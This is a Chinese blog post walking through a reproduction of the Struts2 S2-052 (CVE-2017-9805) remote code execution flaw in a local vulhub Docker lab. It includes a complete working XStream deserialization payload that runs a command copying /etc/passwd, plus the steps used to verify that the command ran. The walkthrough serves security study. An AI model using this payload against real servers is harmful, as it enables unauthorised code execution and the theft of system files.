docker复现s2-052远程代码执行漏洞

已于 2023-03-29 09:42:00 修改
阅读量243 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: docker 容器 ubuntu
于 2023-03-29 09:35:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53856000/article/details/129829720
版权

su root:切换到管理员权限
切换到漏洞环境对应的目录下:cd vulhub-master/struts2/s2-052
启动环境:docker-compose up -d
在这里插入图片描述

访问搭建环境的IP地址:
在这里插入图片描述

随便抓一个包,发送到Repeater后,将request改写成:

POST /orders HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml
Content-Length: 2408
Cookie: JSESSIONID=A82EAA2857A1FFAF61FF24A1FBB4A3C7
Connection: close
Upgrade-Insecure-Requests: 1

<map>
<entry>
     <jdk.nashorn.internal.objects.NativeString>
       <flags>0</flags>
       <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
         <dataHandler>
           <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
             <is class="javax.crypto.CipherInputStream">
               <cipher class="javax.crypto.NullCipher">
                 <initialized>false</initialized>
                 <opmode>0</opmode>
                 <serviceIterator class="javax.imageio.spi.FilterIterator">
                   <iter class="javax.imageio.spi.FilterIterator">
                     <iter class="java.util.Collections$EmptyIterator"/>
                     <next class="java.lang.ProcessBuilder">
                       <command>
<string>cp</string>
<string>/etc/passwd</string>
<string>/tmp/success</string>
                       </command>
                       <redirectErrorStream>false</redirectErrorStream>
                     </next>
                   </iter>
                   <filter class="javax.imageio.ImageIO$ContainsFilter">
                     <method>
                       <class>java.lang.ProcessBuilder</class>
                       <name>start</name>
                       <parameter-types/>
                     </method>
                     <name>foo</name>
                   </filter>
                   <next class="string">foo</next>
                 </serviceIterator>
                 <lock/>
               </cipher>
               <input class="java.lang.ProcessBuilder$NullInputStream"/>
               <ibuffer/>
               <done>false</done>
               <ostart>0</ostart>
               <ofinish>0</ofinish>
               <closed>false</closed>
             </is>
             <consumed>false</consumed>
           </dataSource>
           <transferFlavors/>
         </dataHandler>
         <dataLen>0</dataLen>
       </value>
     </jdk.nashorn.internal.objects.NativeString>
     <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
   </entry>
   <entry>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
     <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
   </entry>
 </map>

ps:success为自定义文件名
在这里插入图片描述

Send发送:
在这里插入图片描述
可以看到已经执行成功(将目标主机的etc/passwd文件复制到/tmp/success文件)

查看容器id:docker ps
在这里插入图片描述

进入容器:docker exec -it d91 /bin/bash(d91为自己的容器id,前三位即可)
在这里插入图片描述

进入/tmp目录下查看:发现创建了success文件,执行成功!
在这里插入图片描述

查看success文件:
在这里插入图片描述

复现成功啦~大家自行尝试吧🌷

全_世界
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
docker-compose-Linux-aarch64
07-10
在arm版本的服务器上可用的docker-compose, 可执行文件
docker-compose-window-2.14.2.exe
12-27
docker-compose-window-2.14.2.exe免费下载
复现S2-052远程代码执行漏洞
BBH_FCC的博客
04-03 115
(1)搭建环境。(2)浏览器中访问地址:http://ip地址:8080。(3)进入编辑页面,点击submit按钮,burpsuite抓包拦截此数据。(4)Content-Type:application/x-www-form-urlencoded 修改(5)可以看到响应页面中有500错误。
漏洞复现S2-052 (CVE-2017-9805)
weixin_30526593的博客
11-20 206
一、漏洞描述 Struts2 的REST插件,如果带有XStream组件,那么在进行反序列化XML请求时,存在未对数据内容进行有效验证的安全隐患,可能发生远程命令执行。 二、受影响版本 Struts2.5 – Struts2.5.12版本 Struts2.3.33版本 三、漏洞POC POST /struts2-rest-sho...
Struts2-052(CVE-2017-9805)远程代码执行漏洞复现
weixin_44253823的博客
11-06 1381
漏洞简介:2017年9月5日,Apache Struts官方发布最新的安全公告称,Apache Struts 2.5.x的REST插件存在远程代码执行高危漏洞漏洞编号为CVE-2017-9805(S2-052),受影响的版本为Struts 2.5 - Struts 2.5.12。攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码漏洞的成因是由于使用XStreamHandler反序列...
S2-052复现过程(附POC利用)
dfdhxb995397的博客
09-06 484
漏洞编号:CVE-2017-9805(S2-052) 影响版本:Struts 2.5 - Struts 2.5.12 漏洞概述:问题出现在struts2-rest-plugin插件XStreamHandler处理器中的toObject()方法,其中未对传入的值进行任何限制,在使用XStream反 0×01 搭建环境 直接部署struts-2.5.12-all中的struts...
S2-052 漏洞复现
weixin_41082546的博客
10-06 1090
Structs2框架已知的漏洞编号如下: S2-005 S2-009 S2-016 (含S2-013) S2-019 S2-020 S2-021 S2-032 S2-037(含S2-033) DevMode S2-045 S2-046 S2-048 S2-052 S2-055 S2-057 S2-052(CVE-2017-9805)环境: https://gi...
Struts S2-052 漏洞复现
时光凉春衫薄的博客
07-23 1582
最近研究了一下docker 发现这个东西真的是快 漏洞环境许多地方都有现成的省的自己去搭建环境了。可以说真的是便利啊。 这两天又在研究struts2 下了环境做个试验玩玩 通过 docker pull medicean/vulapps:s_struts2_s2-052 下载这个漏洞的环境 查看本地的镜像 将这个镜像运行起来 我将docker的业务端口映射到本机的80端口上 ...
docker-compose-linux-aarch64
12-14
docker-compose-linux-aarch64 version v2.17.2 docker-compose git下载慢 特将资源共享
docker-compose-Linux-x86-64
05-26
docker-compose-Linux-x86-64
复现S2远程代码执行漏洞
m0_71326960的博客
04-02 512
2.进入s2-052执行docker-compose up -d命令(此处注意端口被占用会出现下载镜像报错,只需要把正在运行的镜像停止进程)6.说明利用成功,会在docker容器内创建文件/tmp/success,执行docker exec -it 容器id bash。点击send发送数据,出现状态码为200,和vulhub出计算结果后,即漏洞复现成功。3.随便上传一个文件,使用burpsuite进行抓包。1.使用docker搭建漏洞环境,进入目标文件夹。1.使用docker搭建漏洞环境。
struts2(s2-052)远程命令执行漏洞复现
weixin_30929011的博客
09-07 693
漏洞描述: 2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验...
Struts2框架漏洞总结与复现(下)
剁椒鱼头没剁椒的博客
02-08 1678
Apache Struts 1插件的Apache Struts 2.3.x 版本中存在远程代码执行漏洞,该漏洞出现于Struts2的某个类中,该类是为了将Struts1中的Action包装成为Struts2中的Action,以保证Struts2中的Struts1插件启用的情况下,远程攻击者可通过使用恶意字段值,构造特定的输入,发送到ActionMessage类中,从而导致任意命令执行,进而获取目标主机系统权限。在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1355
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
docker镜像反推Dockerfile
最新发布
Merlin's Engineering Blog
05-27 355
在项目运维的过程中,偶尔会遇到某个docker image打包时候的Dockerfile版本管理不善无法与image对应的问题,抑或需要分析某个三方docker image的构建过程,这时,就希望能够通过image反推构建时的instruction.想实现这个过程可以使用一些三方工具比如dive,但是需要额外的安装,其实docker本身也有可用的功能,能帮助我们分析image的构建命令.
docker-compose -f docker-compose-cli.yaml up
04-17
docker-compose -f docker-compose-cli.yaml up命令用于启动使用docker-compose工具编排的多个容器。通过指定一个特定的docker-compose文件(在这里是docker-compose-cli.yaml),可以定义和配置多个容器的运行方式和依赖关系。 具体来说,该命令会读取docker-compose-cli.yaml文件中的配置信息,并根据配置启动相应的容器。这些容器可以是不同的服务,例如数据库、Web服务器、消息队列等。通过docker-compose工具,可以方便地定义容器之间的网络连接、数据卷挂载、环境变量设置等。 在执行docker-compose -f docker-compose-cli.yaml up命令后,docker-compose会根据配置文件中的定义,自动创建并启动相应的容器。如果容器已经存在,则会重新启动它们。启动后,可以通过docker命令查看容器的状态、日志等信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值